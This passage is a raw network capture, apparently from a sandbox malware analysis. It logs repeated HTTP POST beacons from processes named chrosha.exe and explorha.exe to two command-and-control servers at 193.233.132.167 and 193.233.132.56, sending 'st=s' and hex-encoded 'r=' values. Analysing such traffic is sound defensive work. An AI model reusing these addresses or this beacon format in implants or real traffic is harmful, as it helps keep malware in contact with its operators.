                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:54.028039932 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
853 | 192.168.2.5 | 50702 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:54.144115925 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:33:54.387222052 CEST | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:33:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
854 | 192.168.2.5 | 50703 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:54.382502079 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:33:54.629329920 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:33:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
855 | 192.168.2.5 | 50704 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:54.637356043 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:54.886517048 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:33:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
856 | 192.168.2.5 | 50705 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:54.888698101 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:55.144784927 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:33:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
857 | 192.168.2.5 | 50706 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:55.247536898 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:33:55.496339083 CEST | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:33:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
858 | 192.168.2.5 | 50707 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:55.512242079 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:33:55.759602070 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:33:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
859 | 192.168.2.5 | 50708 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:55.745868921 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:55.992925882 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
860 | 192.168.2.5 | 50709 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:56.011627913 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:56.263961077 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
861 | 192.168.2.5 | 50710 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:56.356065035 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:56.605307102 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
862 | 192.168.2.5 | 50711 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:56.622217894 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:56.870923042 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
863 | 192.168.2.5 | 50712 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:56.852037907 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:57.098959923 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
864 | 192.168.2.5 | 50713 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:57.126935959 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:57.378396034 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
865 | 192.168.2.5 | 50714 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:57.463171959 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:57.711149931 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
866 | 192.168.2.5 | 50715 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:57.742928982 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:57.990591049 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
867 | 192.168.2.5 | 50716 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:57.961467028 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:58.208513975 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
868 | 192.168.2.5 | 50717 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:58.238692999 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:58.486506939 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
869 | 192.168.2.5 | 50718 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:58.574690104 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:58.825308084 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
870 | 192.168.2.5 | 50719 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:58.835059881 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:59.076713085 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
871 | 192.168.2.5 | 50720 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:59.078949928 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:59.329955101 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
872 | 192.168.2.5 | 50721 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:59.329852104 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
